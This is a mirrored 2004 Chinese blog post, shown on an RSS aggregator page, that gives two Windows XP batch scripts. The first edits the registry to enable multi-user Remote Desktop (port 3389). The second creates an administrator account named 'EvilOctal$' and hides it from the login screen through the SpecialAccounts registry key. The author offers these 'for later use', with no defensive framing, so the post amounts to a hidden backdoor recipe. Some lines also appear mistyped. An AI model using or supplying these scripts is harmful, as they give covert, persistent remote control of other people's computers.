惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

美团技术团队
D
DataBreaches.Net
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
D
Docker
N
Netflix TechBlog - Medium
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
C
Check Point Blog
腾讯CDC
Stack Overflow Blog
Stack Overflow Blog
V
Visual Studio Blog
IT之家
IT之家
月光博客
月光博客
U
Unit 42
K
Kaspersky official blog
T
Threatpost
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
GbyAI
GbyAI
P
Proofpoint News Feed
Last Week in AI
Last Week in AI
云风的 BLOG
云风的 BLOG
酷 壳 – CoolShell
酷 壳 – CoolShell
I
InfoQ
Engineering at Meta
Engineering at Meta
Recorded Future
Recorded Future
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
S
Security @ Cisco Blogs
MyScale Blog
MyScale Blog
大猫的无限游戏
大猫的无限游戏
Security Archives - TechRepublic
Security Archives - TechRepublic
Webroot Blog
Webroot Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Hacker News - Newest:
Hacker News - Newest: "LLM"
S
Schneier on Security
S
Secure Thoughts
The Register - Security
The Register - Security
B
Blog RSS Feed
The Last Watchdog
The Last Watchdog
P
Palo Alto Networks Blog
爱范儿
爱范儿
B
Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
N
News and Events Feed by Topic
阮一峰的网络日志
阮一峰的网络日志
L
LINUX DO - 热门话题
C
Cisco Blogs
Spread Privacy
Spread Privacy
F
Full Disclosure
博客园 - 聂微东
T
The Blog of Author Tim Ferriss

博客园 - charcs

本blog停止更新,起用新的blog http://www.graywin.org 一生中遇到的十种人 个人安全站点汇总 列出同一个域名下的所有二级域名 - charcs - 博客园 Ascii table - charcs - 博客园 Photoshop快捷键 注册码收集(常用类) 网页制作学习示意图及职位技能介绍 发个人家写的脚本 Google搜索从入门到精通 你留意过自己的父母吗? 感动, 体会爱的心境 一个脚本下载的代码 常用文件扩展名及含义 系统进程让你明明白白 一些关于注册表有用的东西 HTML颜色表 揭开SVCHOST.exe进程之谜 一些常用工具
XP终端服务远程登录批处理 - charcs - 博客园
charcs · 2004-12-02 · via 博客园 - charcs

Posted on 2004-12-02 15:57  charcs  阅读(839)  评论(0)    收藏  举报

给出如下的batch文件...

代码
@echo REGEDIT4>C:\est.reg
@echo. >>C:\est.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]>>C:\est.reg
@echo "EnableConcurrenSessions"=dword:00000000>>C:\est.reg
@echo "Tsenabled"=dword:00000001>>>>C:\est.reg
@regedit /s C:\est.reg
@del /y C:\est.reg
@net start termservice
@shutdown -l

这样就开启了XP中3389的多用户模式...
下面我们加入一个用户并且同步解决在使用友好登录的时候面版上的用户名:)
这个batch这样写
代码
@net user EvilOctal$ security /add
@net local group administrators EvilOctal$ /add
@echo REGEDIT4>C:\EvilOctal.reg
@echo. >>C:\EvilOctal.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\winlogon\specialaccounts\userlist]>>C:\EvilOctal.reg
@echo "EvilOctal$"=dword:00000000>>C:\EvilOctal.reg
@regedit /s C:\EvilOctal.reg
@del /y C:\EvilOctal.reg

嘿嘿 放在这里备用

刷新页面返回顶部